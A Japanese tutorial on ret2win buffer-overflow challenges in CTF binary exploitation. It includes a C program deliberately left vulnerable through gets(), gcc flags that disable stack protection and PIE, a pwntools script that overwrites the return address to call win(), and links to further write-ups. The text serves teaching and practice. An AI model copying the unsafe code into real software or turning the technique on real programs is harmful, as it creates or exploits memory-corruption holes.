基本情報

Ret2win チャレンジは、特にバイナリエクスプロイテーションを含むCapture The Flag (CTF) コンペティションで人気のあるカテゴリです。目標は、与えられたバイナリ内の脆弱性を悪用して、通常win、flagなどと名付けられた特定の未呼び出し関数を実行することです。通常、この関数を実行すると、フラグや成功メッセージが表示されます。チャレンジは、通常、スタック上の戻りアドレスを上書きして、実行フローを目的の関数に誘導することを含みます。以下は、例を交えた詳細な説明です：

Cの例

脆弱性を持つ単純なCプログラムと、呼び出したいwin関数があるとします：

#include <stdio.h>
#include <string.h>

void win() {
printf("Congratulations! You've called the win function.\n");
}

void vulnerable_function() {
char buf[64];
gets(buf); // This function is dangerous because it does not check the size of the input, leading to buffer overflow.
}

int main() {
vulnerable_function();
return 0;
}

このプログラムをスタック保護を無効にして、ASLRを無効にしてコンパイルするには、次のコマンドを使用できます:

gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c

• -m32: プログラムを32ビットバイナリとしてコンパイルする（これはオプションですが、CTFチャレンジで一般的です）。

• -fno-stack-protector: スタックオーバーフローに対する保護を無効にする。

• -z execstack: スタック上でのコードの実行を許可する。

• -no-pie: 位置独立実行可能ファイルを無効にして、win 関数のアドレスが変わらないようにする。

• -o vulnerable: 出力ファイルの名前を vulnerable にする。

Pwntoolsを使用したPythonエクスプロイト

エクスプロイトでは、エクスプロイトスクリプトがバッファをオーバーフローさせ、リターンアドレスを win 関数のアドレスで上書きするペイロードを作成します。

from pwn import *

# Set up the process and context for the binary
binary_path = './vulnerable'
p = process(binary_path)
context.binary = binary_path

# Find the address of the win function
win_addr = p32(0x08048456)  # Replace 0x08048456 with the actual address of the win function in your binary

# Create the payload
# The buffer size is 64 bytes, and the saved EBP is 4 bytes. Hence, we need 68 bytes before we overwrite the return address.
payload = b'A' * 68 + win_addr

# Send the payload
p.sendline(payload)
p.interactive()

win 関数のアドレスを見つけるためには、gdb、objdump、またはバイナリファイルを調査することができる他のツールを使用できます。たとえば、objdump を使用して次のようにします:

objdump -d vulnerable | grep win

このコマンドは、win 関数のアセンブリを表示し、その開始アドレスを含めます。

Pythonスクリプトは、vulnerable_function によって処理されるときに、注意深く作成されたメッセージを送信し、バッファをオーバーフローさせ、スタック上の戻りアドレスを win のアドレスで上書きします。vulnerable_function が返るとき、main に戻るか終了する代わりに、win にジャンプし、メッセージが表示されます。

保護

• PIE は無効にする必要があります。そうしないと、アドレスが実行ごとに信頼性のあるものにならず、関数が格納されるアドレスが常に同じでないため、win 関数がどこにロードされるかを特定するためには何らかのリークが必要になります。オーバーフローを引き起こす関数が read などの場合、1または2バイトの部分的な上書きを行うことで、戻りアドレスを win 関数に変更することができます。ASLRの動作により、最後の3つの16進数のニブルはランダム化されないため、正しい戻りアドレスを取得する確率は1/16（1ニブル）です。

• Stack Canaries も無効にするか、侵害された EIP 戻りアドレスは決して追跡されません。

他の例と参考文献

• https://ir0nstone.gitbook.io/notes/types/stack/ret2win

• https://guyinatuxedo.github.io/04-bof_variable/tamu19_pwn1/index.html

• 32ビット、ASLRなし

• https://guyinatuxedo.github.io/05-bof_callfunction/csaw16_warmup/index.html

• ASLR付きの64ビット、バイナリアドレスのリークあり

• https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html

• 64ビット、ASLRなし

• https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html

• 32ビット、ASLRなし、ダブルスモールオーバーフロー、最初はスタックをオーバーフローさせ、次のオーバーフローのサイズを拡大する

• https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html

• 32ビット、relro、canaryなし、nx、pieなし、アドレス fflush を win 関数（ret2win）で上書きするためのフォーマット文字列

• https://guyinatuxedo.github.io/15-partial_overwrite/tamu19_pwn2/index.html

• 32ビット、nx、その他何もなし、EIP（1バイト）の部分的な上書きで win 関数を呼び出す

• https://guyinatuxedo.github.io/15-partial_overwrite/tuctf17_vulnchat2/index.html

• 32ビット、nx、その他何もなし、EIP（1バイト）の部分的な上書きで win 関数を呼び出す

• https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html

• プログラムは数値の最後のバイトのみを検証して入力サイズを確認しており、したがって、最後のバイトが許可される範囲内であれば任意のサイズを追加することが可能です。その後、入力は ret2win で悪用されるバッファオーバーフローを作成します。

• https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/

• 64ビット、relro、canaryなし、nx、pie。 win 関数（ret2win）を呼び出すための部分的な上書き

• https://8ksec.io/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/

• arm64、PIE、win 関数のPIEリーク、実際には2つの関数を呼び出すROPガジェット

• https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/

• ARM64、オフバイワンで win 関数を呼び出す例

ARM64の例